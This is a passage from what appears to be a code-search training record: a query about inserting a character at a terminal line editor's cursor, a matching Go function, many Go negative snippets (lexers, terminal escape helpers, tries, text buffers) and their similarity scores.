int,listOfNumbers [6]int) {\n\n\tif *positionCursor == 0 { \t\t\t\t\t\t // Scenario 1: position of cursor at the beginning of list\n\n\t\t*positionCursor=numberDigits-1\t\t\t\t // set it to the end\n\n\t\tpositionCursor = &listOfNumbers[numberDigits-1] // sets address of position to be that of the correct element\n\n\t} else {\t\t\t\t\t\t\t\t\t\t // Scenario 2: position of cursor is not at the beginning of list\n\n\t\t*positionCursor--\t\t\t\t\t\t\t // decrease the value of position of the cursor\n\n\t\tvar temp = *positionCursor\t\t\t\t\t // temp variable for position of cursor\n\n\t\tpositionCursor = &listOfNumbers[temp] \t // sets address of position to be that of the correct element\n\t}\n}", "func (ls *linestate) editMoveRight() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos++\n\t\tls.refreshLine()\n\t}\n}", "func CursorPrevLine(count int) string {\n\treturn fmt.Sprintf(\"%s%dF\", csi, count)\n}", "func (p *parser) backup() {\n\t//p.pos.Colunm -= p.length\n\tp.cur -= p.length\n}", "func (o DashboardSpacingOutput) Left() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DashboardSpacing) *string { return v.Left }).(pulumi.StringPtrOutput)\n}", "func (cur *cursor) invalidateAtStart() {\n\tcur.idx = -1\n}", "func TextDeleteChars(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"P\"\n}", "func (e *LineEditor) CursorHome() {\n\te.Cx = 0\n}", "func move(s string, x, y int) string {\n\n\tout := make([]rune, len(s))\n\tt := rune(s[x])\n\n\ts = s[:x] + s[x+1:] //remove x\n\n\ti, j := 0, 0\n\tfor i < len(out) {\n\n\t\tif i == y {\n\t\t\tout[i] = t\n\t\t} else {\n\t\t\tout[i] = rune(s[j])\n\t\t\tj++\n\t\t}\n\t\ti++\n\n\t}\n\n\treturn string(out)\n\n}", "func (l *Lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *Lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *Lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *Lexer) backup() {\n\tl.pos -= l.width\n}", "func CursorPrevLine(r uint) {\n\temitEscape(\"F\", r)\n}", "func ClearLineStart() {\n\tfmt.Printf(\"\\033[1K\")\n}", "func ClearLineStart() {\n\tfmt.Printf(\"\\033[1K\")\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func ClearLine(headerWidth int) string {\n\tout := \"\"\n\tout += fmt.Sprint(cursorAbsoluteLeft)\n\tout += fmt.Sprint(clearLine)\n\tout += fmt.Sprint(cursorRight(headerWidth))\n\n\treturn out\n}", "func (tm *Term) ScrollLeft() error {\n\ttm.ColSt = ints.MaxInt(tm.ColSt-1, 0)\n\treturn tm.Draw()\n}", "func (e *LineEditor) CursorEnd() {\n\te.Cx = len(e.Row)\n}", "func (l *Lexer) Backup() {\n\tl.pos -= l.width\n}", "func (l *Lexer) Backup() {\n\tl.pos -= l.width\n}", "func (l *Lexer) Backup() {\n\tl.pos -= l.width\n}", "func (w *VT100Writer) CursorBack(n int) {\n\tif n < 0 {\n\t\tw.CursorForward(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'D'})\n\t}\n}", "func (o DashboardSpacingPtrOutput) Left() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DashboardSpacing) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Left\n\t}).(pulumi.StringPtrOutput)\n}", "func TrimLeftChar(s string) string {\n\tfor i := range s {\n\t\tif i > 0 {\n\t\t\treturn s[i:]\n\t\t}\n\t}\n\treturn s[:0]\n}", "func (l *lexer) backup() {\n\tif l.width == -1 {\n\t\tpanic(\"double backup\")\n\t}\n\tl.pos -= l.width\n\tl.width = -1\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n\tl.width = 0\n}", "func DelDirtyCharacter(str string) string {\n\tres := \"\"\n\tif len(str) > 0 {\n\t\treg, _ := regexp.Compile(\"[ \\f\\n\\r\\t\\v ]+\")\n\t\tres = reg.ReplaceAllString(str, \"\")\n\t}\n\treturn res\n}", "func (e *Editor) Line() (string, error) {\n\tif err := e.editReset(); err != nil {\n\t\treturn string(e.Buffer), err\n\t}\nline:\n\tfor {\n\t\tr, _, err := e.In.ReadRune()\n\t\tif err != nil {\n\t\t\treturn string(e.Buffer), err\n\t\t}\n\n\t\tswitch r {\n\t\tcase enter:\n\t\t\tbreak line\n\t\tcase ctrlC:\n\t\t\treturn string(e.Buffer), errors.New(\"try again\")\n\t\tcase backspace, ctrlH:\n\t\t\tif err := e.editBackspace(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlD:\n\t\t\tif len(e.Buffer) == 0 {\n\t\t\t\treturn string(e.Buffer), io.EOF\n\t\t\t}\n\n\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlT:\n\t\t\tif err := e.editSwap(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlB:\n\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlF:\n\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlP:\n\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlN:\n\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlU:\n\t\t\tif err := e.editReset(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlK:\n\t\t\tif err := e.editKillForward(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlA:\n\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlE:\n\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlL:\n\t\t\tif err := e.clearScreen(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tif err := e.refreshLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlW:\n\t\t\tif err := e.editDeletePrevWord(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase esc:\n\t\t\tr, _, err := e.In.ReadRune()\n\t\t\tif err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tswitch r {\n\t\t\tcase '[':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase '0', '1', '2', '4', '5', '6', '7', '8', '9':\n\t\t\t\t\t_, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase '3':\n\t\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\n\t\t\t\t\tswitch r {\n\t\t\t\t\tcase '~':\n\t\t\t\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\tcase 'A':\n\t\t\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'B':\n\t\t\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'C':\n\t\t\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'D':\n\t\t\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase 'O':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase tab:\n\t\t\tif err := e.completeLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tdefault:\n\t\t\tif err := e.editInsert(r); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn string(e.Buffer), nil\n}", "func (l *reader) backup() {\n\tif l.width > 0 {\n\t\terr := l.input.UnreadRune()\n\t\tif err != nil {\n\t\t\tfmt.Println(\"err: \", err)\n\t\t}\n\t\tl.current.Truncate(l.current.Len() - l.width)\n\t}\n}", "func (c *Cursor) Last() {\n\tc.pos = c.end - 1\n}", "func (ls *linestate) deleteToEnd() {\n\tls.buf = ls.buf[:ls.pos]\n\tls.refreshLine()\n}", "func (tv *TextView) DeleteSelection() *TextBufEdit {\n\ttbe := tv.Buf.DeleteText(tv.SelectReg.Start, tv.SelectReg.End, true, true)\n\ttv.SelectReset()\n\treturn tbe\n}" ]
[ "0.6931943", "0.6675788", "0.63332933", "0.63267565", "0.62952375", "0.6169678", "0.6126563", "0.60828185", "0.5912601", "0.5898569", "0.5814333", "0.5758422", "0.5742485", "0.57424265", "0.5734684", "0.57340974", "0.57005805", "0.56671005", "0.56294894", "0.56037384", "0.55953085", "0.5586916", "0.55737245", "0.5563102", "0.5558959", "0.55138797", "0.5492799", "0.5476464", "0.54282135", "0.54146916", "0.54146916", "0.5414203", "0.53826654", "0.53512335", "0.5343042", "0.5331185", "0.5324163", "0.53131336", "0.53104645", "0.52976465", "0.5280524", "0.52774024", "0.5266762", "0.52666146", "0.5263452", "0.52634007", "0.52396035", "0.5226087", "0.52135265", "0.5183392", "0.5174117", "0.5155907", "0.514415", "0.5135841", "0.51342183", "0.51315266", "0.5112281", "0.51049066", "0.5080336", "0.50727713", "0.5057679", "0.5056559", "0.5055074", "0.5022161", "0.50170785", "0.5008967", "0.5008967", "0.5008967", "0.5008967", "0.4992579", "0.4987004", "0.4987004", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.49794385", "0.4973363", "0.49721995", "0.49557605", "0.49463663", "0.49463663", "0.49463663", "0.49444744", "0.49417084", "0.49402532", "0.49315184", "0.49164486", "0.4916328", "0.49145576", "0.49116856", "0.49031675", "0.49020827", "0.48898807" ]
0.55979943
20
insert a character at the current cursor position
func (ls *linestate) editInsert(r rune) { ls.buf = append(ls.buf[:ls.pos], append([]rune{r}, ls.buf[ls.pos:]...)...) ls.pos++ ls.refreshLine() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (i *Input) Insert(r rune) {\n\ti.Buffer.InsertRune(r, i.Pos)\n\ti.Pos++\n}", "func (r *Row) insertChar (char string, index int) {\n content := r.content.Bytes()\n newBuffer := bytes.NewBuffer(nil)\n\n newBuffer.Write(content[:index])\n newBuffer.Write([]byte(char))\n newBuffer.Write(content[index:])\n\n r.content = newBuffer\n r.size = newBuffer.Len()\n}", "func (e *LineEditor) InsertChar(c rune) {\n\n\t// store a reference to the working row to improve readability\n\tsrc := e.Row\n\n\tdest := make([]rune, len(src)+1)\n\tcopy(dest, src[:e.Cx])\n\tcopy(dest[e.Cx+1:], src[e.Cx:])\n\tdest[e.Cx] = c\n\n\te.Row = dest\n\te.Cx++\n}", "func (b *Buffer) PutChar(c byte) error {\n\tb.Cursor.Char = c\n\to := b.Cursor.Offset(b.Width)\n\tt := b.Expand(o).Tile(o)\n\tt.Update(&b.Cursor.Tile)\n\tb.Cursor.X++\n\tb.Cursor.NormalizeAndWrap(b.Width)\n\tb.maxWidth = calc.MaxInt(b.maxWidth, b.Cursor.X)\n\tb.maxHeight = calc.MaxInt(b.maxHeight, b.Cursor.Y)\n\treturn nil\n}", "func (e *Editor) Insert(s string) {\n\te.append(s)\n\te.caret.scroll = true\n}", "func (tv *TextView) InsertAtCursor(txt []byte) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\tif tv.HasSelection() {\n\t\ttbe := tv.DeleteSelection()\n\t\ttv.CursorPos = tbe.AdjustPos(tv.CursorPos, AdjustPosDelStart) // move to start if in reg\n\t}\n\ttbe := tv.Buf.InsertText(tv.CursorPos, txt, true, true)\n\tif tbe == nil {\n\t\treturn\n\t}\n\tpos := tbe.Reg.End\n\tif len(txt) == 1 && txt[0] == '\\n' {\n\t\tpos.Ch = 0 // sometimes it doesn't go to the start..\n\t}\n\ttv.SetCursorShow(pos)\n\ttv.SetCursorCol(tv.CursorPos)\n}", "func Insert(str string, pos int, value string) string {\n\treturn string([]rune(str)[:pos]) + value + string([]rune(str)[pos:])\n}", "func (e *ObservableEditableBuffer) InsertAt(rp0 int, rs []rune) {\n\tp0 := e.f.RuneTuple(rp0)\n\ts, nr := RunesToBytes(rs)\n\n\te.Insert(p0, s, nr)\n}", "func (l *littr) Insert(s string, i int) {\n\tl.code = l.code[:i] + s + l.code[i:]\n}", "func insertAt(i int, char string, perm string) string {\n\tstart := perm[0:i]\n\tend := perm[i:len(perm)]\n\treturn start + char + end\n}", "func (t *KeyBordInput) Insert(cmd string) {\n\tt.C <- cmd\n}", "func (b *Bag) Insert(val rune) {\n\tb.data[val]++\n}", "func (l *ListInfo) insertRune(inputRune rune) {\n\tl.Keyword = l.Keyword + string(inputRune)\n\n}", "func (tv *TextView) KeyInputInsertRune(kt *key.ChordEvent) {\n\tkt.SetProcessed()\n\tif tv.ISearch.On { // todo: need this in inactive mode\n\t\ttv.CancelComplete()\n\t\ttv.ISearchKeyInput(kt)\n\t} else if tv.QReplace.On { // todo: need this in inactive mode\n\t\ttv.CancelComplete()\n\t\ttv.QReplaceKeyInput(kt)\n\t} else {\n\t\tif kt.Rune == '{' || kt.Rune == '(' || kt.Rune == '[' {\n\t\t\tbufUpdt, winUpdt, autoSave := tv.Buf.BatchUpdateStart()\n\t\t\tpos := tv.CursorPos\n\t\t\tvar close = true\n\t\t\tif pos.Ch < tv.Buf.LineLen(pos.Ln) && !unicode.IsSpace(tv.Buf.Line(pos.Ln)[pos.Ch]) {\n\t\t\t\tclose = false\n\t\t\t}\n\t\t\tpos.Ch++\n\t\t\tif close {\n\t\t\t\tmatch, _ := PunctGpMatch(kt.Rune)\n\t\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune) + string(match)))\n\t\t\t\ttv.lastAutoInsert = match\n\t\t\t} else {\n\t\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune)))\n\t\t\t}\n\t\t\ttv.SetCursorShow(pos)\n\t\t\ttv.SetCursorCol(tv.CursorPos)\n\t\t\ttv.Buf.BatchUpdateEnd(bufUpdt, winUpdt, autoSave)\n\t\t} else if kt.Rune == '}' && tv.Buf.Opts.AutoIndent {\n\t\t\ttv.CancelComplete()\n\t\t\ttv.lastAutoInsert = 0\n\t\t\tbufUpdt, winUpdt, autoSave := tv.Buf.BatchUpdateStart()\n\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune)))\n\t\t\ttbe, _, cpos := tv.Buf.AutoIndent(tv.CursorPos.Ln, DefaultIndentStrings, DefaultUnindentStrings)\n\t\t\tif tbe != nil {\n\t\t\t\ttv.RenderLines(tv.CursorPos.Ln, tv.CursorPos.Ln)\n\t\t\t\ttv.SetCursorShow(TextPos{Ln: tbe.Reg.End.Ln, Ch: cpos})\n\t\t\t}\n\t\t\ttv.Buf.BatchUpdateEnd(bufUpdt, winUpdt, autoSave)\n\t\t} else if tv.lastAutoInsert == kt.Rune { // if we type what we just inserted, just move past\n\t\t\ttv.CursorPos.Ch++\n\t\t\ttv.SetCursorShow(tv.CursorPos)\n\t\t\ttv.lastAutoInsert = 0\n\t\t} else {\n\t\t\ttv.lastAutoInsert = 0\n\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune)))\n\t\t\tif kt.Rune == ' ' {\n\t\t\t\ttv.CancelComplete()\n\t\t\t} else {\n\t\t\t\ttv.OfferComplete()\n\t\t\t}\n\t\t}\n\t\tif kt.Rune == '}' || kt.Rune == ')' || kt.Rune == ']' {\n\t\t\tcp := tv.CursorPos\n\t\t\tnp := cp\n\t\t\tnp.Ch--\n\t\t\ttp, found := tv.Buf.FindScopeMatch(kt.Rune, np)\n\t\t\tif found {\n\t\t\t\ttv.Scopelights = append(tv.Scopelights, NewTextRegionPos(tp, TextPos{tp.Ln, tp.Ch + 1}))\n\t\t\t\ttv.Scopelights = append(tv.Scopelights, NewTextRegionPos(np, TextPos{cp.Ln, cp.Ch}))\n\t\t\t\tif tv.CursorPos.Ln < tp.Ln {\n\t\t\t\t\ttv.RenderLines(cp.Ln, tp.Ln)\n\t\t\t\t} else {\n\t\t\t\t\ttv.RenderLines(tp.Ln, cp.Ln)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func (tto *TtoT) PutChar(c byte) {\n\ttto.ttoMu.Lock()\n\ttto.conn.Write([]byte{c})\n\ttto.ttoMu.Unlock()\n}", "func openInsert(gs *GlobalState) {\n\tif eb, ok := gs.curbuf.Value.(*EditBuffer); ok {\n\t\teb.AppendEmptyLine()\n\t\teb.moveDown(1) // move down to the new line...\n\t\teb.redraw = true\n\t\tgs.Mode = MODEINSERT\n\t\tinput(gs)\n\t}\n}", "func insert(s split, save func(string)) {\n\tfor _, c := range letters {\n\t\tsave(s.L + string(c) + s.R)\n\t}\n}", "func (r *Rope) Insert(at int, str string) error {\n\treturn r.InsertBytes(at, []byte(str))\n}", "func WriteChar(char rune) {}", "func (l *Line) InsertRune(r rune, pos int) *Line {\n\tl.runes = append(l.runes[:pos], append([]rune{r}, l.runes[pos:]...)...)\n\treturn l\n}", "func TextInsertChars(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"@\"\n}", "func (e *ObservableEditableBuffer) Insert(p0 OffsetTuple, s []byte, nr int) {\n\tbefore := e.getTagStatus()\n\tdefer e.notifyTagObservers(before)\n\n\te.f.Insert(p0, s, nr, e.seq)\n\tif e.seq < 1 {\n\t\te.f.FlattenHistory()\n\t}\n\te.inserted(p0, s, nr)\n}", "func StartInsert(ev KeyEvent) {\n\tev.State().SetMode(ev.App().Insert)\n}", "func SaveCursorPos() {\n\temitEscape(\"s\")\n}", "func (ref Ref) Insert(x *Term, pos int) Ref {\n\tswitch {\n\tcase pos == len(ref):\n\t\treturn ref.Append(x)\n\tcase pos > len(ref)+1:\n\t\tpanic(\"illegal index\")\n\t}\n\tcpy := make(Ref, len(ref)+1)\n\tcopy(cpy, ref[:pos])\n\tcpy[pos] = x\n\tcopy(cpy[pos+1:], ref[pos:])\n\treturn cpy\n}", "func CursorPos(x, y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \";\" + strconv.Itoa(x+1) + \"H\"\n}", "func (t *Textarea) InsertText(text string) {\n\tss := t.GetSelectionStart()\n\tse := t.GetSelectionEnd()\n\n\tval := t.GetValue()\n\tval = val[:ss] + text + val[se:]\n\tt.Set(\"value\", val)\n\n\tss = ss + len(text)\n\tt.SetSelectionStart(ss)\n\tt.SetSelectionEnd(ss) // the same as start\n}", "func (l *Line) insertString(col int, s string) int {\n\telem := l.elemFromCol(col)\n\tl.s = append(l.s, s...) // grow l by len(s)\n\tcopy(l.s[elem+len(s):], l.s[elem:])\n\n\t// insert s\n\tfor i := 0; i < len(s); i++ {\n\t\tl.s[elem+i] = s[i]\n\t}\n\n\treturn col + utf8.RuneCountInString(s)\n}", "func (this *Trie) Insert(word string) {\n\tcurrentNode := this.root\n\tfor _, char := range word {\n\t\tif _, ok := currentNode.links[char-97]; !ok {\n\t\t\tcurrentNode.links[char-97] = &TrieNode{links:make(map[int32]*TrieNode)}\n\t\t}\n\n\t\tcurrentNode = currentNode.links[char-97]\n\t}\n\n\tcurrentNode.isEnd = true\n}", "func (b *outputBuffer) appendChar(char rune) {\n\tswitch char {\n\tcase '&':\n\t\tb.buf.WriteString(\"&amp;\")\n\tcase '\\'':\n\t\tb.buf.WriteString(\"&#39;\")\n\tcase '<':\n\t\tb.buf.WriteString(\"&lt;\")\n\tcase '>':\n\t\tb.buf.WriteString(\"&gt;\")\n\tcase '\"':\n\t\tb.buf.WriteString(\"&quot;\")\n\tcase '/':\n\t\tb.buf.WriteString(\"&#47;\")\n\tdefault:\n\t\tb.buf.WriteRune(char)\n\t}\n}", "func InsertStringForScene(str *string, insertStr string, mode int, pos int) {\n\tvar temp string\n\ttemp = *str\n\tif len(*str) != 28 {\n\t\tif len(*str) > 28 {\n\t\t\ttemp = temp[:28]\n\t\t} else {\n\t\t\tfor i := len(*str); i < 28; i++ {\n\t\t\t\ttemp += \" \"\n\t\t\t}\n\t\t}\n\t}\n\tif mode == 0 {\n\t\ttemp = temp[:pos] + insertStr + temp[pos+1:]\n\t} else if mode == 1 {\n\t\tpos = ScreenWidth - (pos + len(insertStr))\n\t\ttemp = temp[:pos] + insertStr + temp[pos+1:]\n\t}\n\t*str = temp\n}", "func CursorForward(c uint) {\n\temitEscape(\"C\", c)\n}", "func setCursorLoc(x, y int) {\n\tfmt.Printf(\"\\033[%v;%vH\", y, x)\n}", "func (s *Store) Insert(ln, col int, st string) error {\n\tif ln < 0 || ln >= len(s.lines) {\n\t\treturn fmt.Errorf(\"Insert: line %v out of range\", ln)\n\t}\n\ts.lines[ln].insertString(col, st)\n\ts.AddUndoSet(s.lines[ln].changeSet(ln, s.undoFac))\n\treturn nil\n}", "func (e *Editor) prepend(s string) {\n\tif e.singleLine {\n\t\ts = strings.ReplaceAll(s, \"\\n\", \" \")\n\t}\n\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs,\n\t\te.caret.end.ofs-e.caret.start.ofs) // Delete any selection first.\n\te.editBuffer.prepend(e.caret.start.ofs, s)\n\te.caret.start.xoff = 0\n\te.invalidate()\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func (this *Trie) Insert(word string) {\r\n\tstrbyte := []byte(word)\r\n\tcurroot := this\r\n\tfor _, char := range strbyte {\r\n\t\tcurchild := curroot.childs[char-'a']\r\n\t\tif curchild == nil {\r\n\t\t\ttemp := Constructor()\r\n\t\t\tcurchild = &temp\r\n\r\n\t\t\t//fmt.Printf(\"set:%+v char:%d\", curchild, char)\r\n\t\t}\r\n\t\tcurroot.childs[char-'a'] = curchild\r\n\t\tcurroot = curchild\r\n\t}\r\n\tcurroot.isword = true\r\n}", "func (this *Trie) Insert(word string) {\n\n\tcur := this\n\tfor i := 0; i < len(word); i++ {\n\t\tb := word[i]\n\t\tif cur.next[b-97] == nil {\n\t\t\tcur.next[b-97] = new(Trie)\n\t\t}\n\t\tcur = cur.next[b-97]\n\t}\n\tcur.isEnd = true\n}", "func aboveOpenInsert(gs *GlobalState) {\n\tif eb, ok := gs.curbuf.Value.(*EditBuffer); ok {\n\t\teb.insertEmptyLine(eb.lno)\n\t\teb.redraw = true\n\t\tgs.Mode = MODEINSERT\n\t\tinput(gs)\n\t}\n}", "func (s *BaseCGListener) EnterEscapedchar(ctx *EscapedcharContext) {}", "func CursorPosX(x int) string {\n\treturn Esc + strconv.Itoa(x+1) + \"G\"\n}", "func insertIndex(index []byte, c byte, idx int) {\n\t// Append to \"grow\" the slice, should never reallocate so we don't need to\n\t// return the slice to the caller since the underlying byte array has been\n\t// modified as desired.\n\tindex = append(index, c)\n\tcopy(index[idx+1:], index[idx:])\n\tindex[idx] = c\n}", "func (trie *Trie) Insert(word string) {\n\tnodeObj, foundFunc := trie.FindNode(word)\n\t// case: node already exists & is a terminal\n\tif foundFunc {\n\t\tif nodeObj.Terminal {\n\t\t\treturn\n\t\t}\n\n\t}\n\n\tnodeObj = trie.Root\n\tfor _, char := range word {\n\t\t_, found := nodeObj.Children[string(char)]\n\n\t\t// case: if the letter does not exist as a child from current node\n\t\tif !found {\n\t\t\tnewChildNode := node.NewNode(string(char))\n\t\t\tnodeObj.AddChildren(string(char), newChildNode)\n\t\t\t// traverse tree\n\t\t}\n\t\tnodeObj = nodeObj.Children[string(char)]\n\n\t}\n\n\t// set node terminal to true at the end of word iteration\n\tnodeObj.Terminal = true\n\n\ttrie.Size++\n}", "func (this *Trie) Insert(word string) {\n\tthis.words[len(word)] = append(this.words[len(word)], word)\n}", "func (t *Trie) Insert(word string) {\n\tnode := t\n\tfor _, c := range word {\n\t\tchar := c - 'a'\n\t\tif node.chars[char] == nil {\n\t\t\tnode.chars[char] = &Trie{isEnd: false, chars: [26]*Trie{}}\n\t\t}\n\t\tnode = node.chars[char]\n\t}\n\tnode.isEnd = true\n}", "func (this *Trie) Insert(word string) {\n\tcur := this.root\n\tfor _, v := range []byte(word) {\n\t\tif cur.children[v-'a'] == nil {\n\t\t\tcur.children[v-'a'] = &TrieNode{children: make([]*TrieNode, 26)}\n\t\t}\n\t\tcur = cur.children[v-'a']\n\t}\n\tcur.word = word\n}", "func (tb *TextBuf) InsertText(st TextPos, text []byte, saveUndo, signal bool) *TextBufEdit {\n\tif len(text) == 0 {\n\t\treturn nil\n\t}\n\tif len(tb.Lines) == 0 {\n\t\ttb.New(1)\n\t}\n\tst = tb.ValidPos(st)\n\ttb.FileModCheck()\n\ttb.LinesMu.Lock()\n\ttb.SetChanged()\n\tlns := bytes.Split(text, []byte(\"\\n\"))\n\tsz := len(lns)\n\trs := bytes.Runes(lns[0])\n\trsz := len(rs)\n\ted := st\n\tvar tbe *TextBufEdit\n\tif sz == 1 {\n\t\tnt := append(tb.Lines[st.Ln], rs...) // first append to end to extend capacity\n\t\tcopy(nt[st.Ch+rsz:], nt[st.Ch:]) // move stuff to end\n\t\tcopy(nt[st.Ch:], rs) // copy into position\n\t\ttb.Lines[st.Ln] = nt\n\t\ted.Ch += rsz\n\t\ttb.LinesMu.Unlock()\n\t\ttbe = tb.Region(st, ed)\n\t\tif saveUndo {\n\t\t\ttb.SaveUndo(tbe)\n\t\t}\n\t\ttb.LinesEdited(tbe)\n\t} else {\n\t\tif tb.Lines[st.Ln] == nil {\n\t\t\ttb.Lines[st.Ln] = []rune(\"\")\n\t\t}\n\t\teostl := len(tb.Lines[st.Ln][st.Ch:]) // end of starting line\n\t\tvar eost []rune\n\t\tif eostl > 0 { // save it\n\t\t\teost = make([]rune, eostl)\n\t\t\tcopy(eost, tb.Lines[st.Ln][st.Ch:])\n\t\t}\n\t\ttb.Lines[st.Ln] = append(tb.Lines[st.Ln][:st.Ch], rs...)\n\t\tnsz := sz - 1\n\t\ttmp := make([][]rune, nsz)\n\t\tfor i := 1; i < sz; i++ {\n\t\t\ttmp[i-1] = bytes.Runes(lns[i])\n\t\t}\n\t\tstln := st.Ln + 1\n\t\tnt := append(tb.Lines, tmp...) // first append to end to extend capacity\n\t\tcopy(nt[stln+nsz:], nt[stln:]) // move stuff to end\n\t\tcopy(nt[stln:], tmp) // copy into position\n\t\ttb.Lines = nt\n\t\ttb.NLines = len(tb.Lines)\n\t\ted.Ln += nsz\n\t\ted.Ch = len(tb.Lines[ed.Ln])\n\t\tif eost != nil {\n\t\t\ttb.Lines[ed.Ln] = append(tb.Lines[ed.Ln], eost...)\n\t\t}\n\t\ttb.LinesMu.Unlock()\n\t\ttbe = tb.Region(st, ed)\n\t\tif saveUndo {\n\t\t\ttb.SaveUndo(tbe)\n\t\t}\n\t\ttb.LinesInserted(tbe)\n\t}\n\tif signal {\n\t\ttb.TextBufSig.Emit(tb.This(), 